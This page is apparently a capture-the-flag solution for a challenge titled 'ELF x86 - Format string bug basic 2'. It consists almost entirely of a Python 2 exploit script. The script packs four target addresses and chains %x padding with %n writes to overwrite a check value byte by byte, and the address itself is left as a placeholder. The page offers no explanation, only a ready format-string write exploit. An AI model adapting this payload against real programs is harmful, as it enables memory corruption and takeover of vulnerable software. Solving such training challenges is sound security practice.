Skip to main content

ELF x86 - Format string bug basic 2

import struct

CHECK_ADDR =

<addr>

exploit = "" exploit += struct.pack("I", CHECK_ADDR) # $9 exploit += struct.pack("I", CHECK_ADDR + 1) # $10 exploit += struct.pack("I", CHECK_ADDR + 2) # $11 exploit += struct.pack("I", CHECK_ADDR + 3) # $12

exploit += "%9$223x" exploit += "%9$n"

exploit += "%10$207x" exploit += "%10$n"

exploit += "%11$239x" exploit += "%11$n"

exploit += "%12$305x" exploit += "%12$n"

print exploit